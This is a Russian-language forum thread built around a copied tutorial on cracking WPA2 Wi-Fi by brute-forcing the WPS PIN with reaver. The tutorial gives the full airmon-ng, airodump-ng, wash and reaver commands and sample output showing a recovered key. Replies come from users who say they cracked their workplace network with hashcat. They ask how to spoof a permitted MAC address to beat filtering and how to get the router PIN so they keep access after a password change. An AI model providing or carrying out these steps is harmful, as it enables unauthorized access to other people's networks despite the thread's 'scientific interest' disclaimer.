Столько отписали и не одного дельного поста Я знаю что времени у многих не хватает, в том числе и у меня, а гугл ничего путного увы не выдает ... Просьба, ткните носом что не так делаю ?
Все описанное будем проделывать в Ubuntu, либо можно использвать дистрибутив Back track 5 , в репозиториях которого уже есть нужный софт. А для Ubuntu подключить репозитории BackTrack: Для Ubuntu. $ sudo gedit /etc/apt/sources.list Добавим в конец файла следующее: # Repository Backtrack deb http://all.repository.backtrack-linux.org deb http://all.repository.backtrack-linux.org revolution main microverse non-free testing deb http://32.repository.backtrack-linux.org revolution main microverse non-free testing deb http://source.repository.backtrack-linux.org revolution main microverse non-free testing Экспортируем ключ безопастности репозитория: $ wget -q http://all.repository.backtrack-linux.org/backtrack.gpg -O- | sudo apt-key add - И обновим списки пакетов: $ sudo apt-get update Ставим пакеты: $ sudo apt-get install aircrack-ng reaver. Для windows Качаем дистрибутив Back track 5. Если не знаем что такое торрент то взломать точно не выйдет)). Находим флешку от 8 гб или dvd-r или rw диск. Для записи флешки нам понадобиться програмка Uniwersal USB Instaler Скачиваем, запускаем Выбераем Backtrack 5 r3 Вставляем наш образ. Выбераем нашу флешку. Нажимаем Create. Ждем окончания процесса. Готово. На диск записать можно даже стандартным прожигом оброзов от windows в 7. Не буду вдаваться в подробности. Перезагружаем и выбераем запуск с носителя где записан Backtrack Ждем пока всё не прогрузиться если загрузка в какой то момент встала. Пишем startx. После загрузки рабочего стола открываем консоль. Взлом WPS: Так как взломать Wi-Fi сеть WPA2-PSK ? Переведем нашу карту в monitor mode Code: $ sudo airmon-ng start wlan0 Должно быть примерное так: Code: Interface Chipset Driver wlan0 Ralink 2561 PCI rt61pci - [phy0] (monitor mode enabled on mon0) Теперь найдем жертву Code: $ sudo airodump-ng mon0 Будет список доступных сетей: Остоновить поиск Ctrl+c Code: CH 5 ][ Elapsed: 12 s ][ 2012-05-17 16:45 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 1C:BD:B9:B5:C6:B9 -58 6 0 0 2 54 WPA2 TKIP PSK iformula.ru 193.240 BSSID STATION PWR Rate Lost Packets Probes Проверим, включен ли WPS на точке Code: $ sudo wash -i mon0 Начинаем перебор: Code: $ sudo reaver -i mon0 -b 1C:BD:B9:B5:C6:B9 -a -vv Где mon0 - имя виртуального интерфейса, далее мак адресс точки. -а - автоматически определять параметры взлома. -vv - диагностические сообщения В результате пошел перебор пинов: Reaver v1.4 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner [email protected] [+] Waiting for beacon from 1C:BD:B9:B5:C6:B9 [+] Switching mon0 to channel 1 [+] Switching mon0 to channel 2 [+] Associated with 1C:BD:B9:B5:C6:B9 (ESSID: iformula.ru 193.240) [+] Trying pin 12345670 В конечном итоге : [+] WPS PIN: '80369424' [+] WPA PSK: 'TryT0H4CkMe' [+] AP SSID: 'iformula.ru 193.240' видим как взлом Wi-Fi сети WPA2 успешно заверен. Особо любознательные могут усовершенствовать перебор и сократить его время, изучив все возможности reaver: $ reaver -h Возможные проблемы: - не появляется mon0 интерфейс: карточка или драйвер не поддерживают monitor mode - В лог сыпятся строки [!] WARNING: Receive timeout occured: какая то проблема с wi-fi картой, причину я не смог найти, просто использовал другой адаптер. - В логе [!] WARNING : Fialed to associate with XX:XX:XX:XX:XX:XX (ESSID: d-link) : на точке включена фильтрация по мак адресам. нужно сниферить нужный мак и ставить его себе. (airodump-ng) Дополнительно: Данный материал предназначен только в целях научного интереса и восстановления своего забытого пароля. Соблюдайте законодательство РФ. Если ещё есть какие то вопросы то пишем обращаемся. Писал на скорую руку в будущем добавлю картинки и возможно видеоинструкцию. Матерьял взят с сайта http://blogzadrota.ru
Хм... Подскажите что не так, при запуске монитора выдает такую мессагу: Opening start open failed: No such file or directory Opening wlan1 open failed: No such file or directory Read 0 packets. No networks found, exiting.
Сигнал на 5 баллов, через стенку, мой роутер вон показывает -47 в одной комнате. Так что сигнал очень хороший. Тесть идей не каких как понимаю нет, удочку закинули и разбирайся как хочешь. Лады с убунту ковырятся не хочется, ну её нафик это занятие, время мало.
))) Что ж там разбираться то, открыл консоль да и набрал нужные команды, собрал хендшейки и делов то!
Неплохая статья с Блогмега про взлом вайфай, старожилам конечно америки не откроет, но новичкам может быть полезно http://blogmega.ru/hitech/it/vzlom-wi-fi-parolya/
Недавно взломал вафлю на работе с помощью bt5 и подбора пароля через hashcat,ввожу пароль идет подключение,но соединения с нетом нет ( может сисадмин поставил фильтрацию по mac адресу?подскажите как можно решить проблему?P.S Пробовал вручную прописывать ip 192.168.1.1 (.2 .3 и тд) и dns 255.255.255.0 не помогло (((
Не совсем понятно, вы вообще подключились? Возможно там просто нет подключения к интернету, всего делов то)
Интернет там есть всегда,подключаюсь с андройда,пишет что сохранено но не подключает,только что нарыл в нете как поменять mac адрес на андройде(есть mac с которого есть подключение) завтра попробую )
У меня вопрос:У меня есть пароль от взломанной вафли,как мне теперь узнать пин код роутера,на случай если админ задумает сменить пароль от вафли?и можно ли самому прописывать mac адреса во взломанной сети(на случай фильтрации)?
какое максимальное значение TX-Power (мощность передачи) для Боливии? У меня адаптер на 38 dBm Не могу установить мощность больше 30 dBm Кто нибудь с этим сталкивался?
У меня есть разрешенный mac,но если сисадмин вдруг решит сменить пароль как тогда подключатся?опять взлом?я ломал вафлю через bt5,у меня есть только пароль,а хотелось бы и пин код от роутера(так наверно проще будет если сменят пароль от вафли)
Нужна помощь,если кто сталкивался,подскажите:Подключаюсь к взлом анной вафле (WPA 2 PSK) с телефона(Samsung galaxy s2 root есть),на родном мак адресе выдает:подключение-аутентификация-получение IP адреса-сохранено защита WPA 2 и потом опять все сначало(значок вафли не загорается).Узнал мак адрес по которому точно есть подключение,поставил его себе,стало выдавать:подключение-аутентификация и на этом висит(ждал минут двадцать).Что можно сделать чтоб подключиться? Может надо и имя хоста заменить на андройде android-a42a3a1bbef7af65)?
Можно где-нибудь скачать рабочую версию Hashcat ? На сайте автора только "outdated" , которые не хотят работать. А hashcat-gui alternate я не понял как запускать, подскажите, пожалуйста.
Качаешь alternate версию http://home.btconnect.com/md5decrypter/HashcatGUI_0281.zip Качаешь https://hashcat.net/oclhashcat-plus/ вот здесь v0.14, разархивируешь в папку с GUI, запускаешь этот гуи, все должно работать, если не работает - внизу нужно выбрать местоположение запускаемого файла (строка Binary, нужно выбрать в зависимости от разрядности винды и чипа видеокарты), у меня так: D:\hashcat-gui-0.5.1\oclHashcat-plus\cudaHashcat-plus64.exe
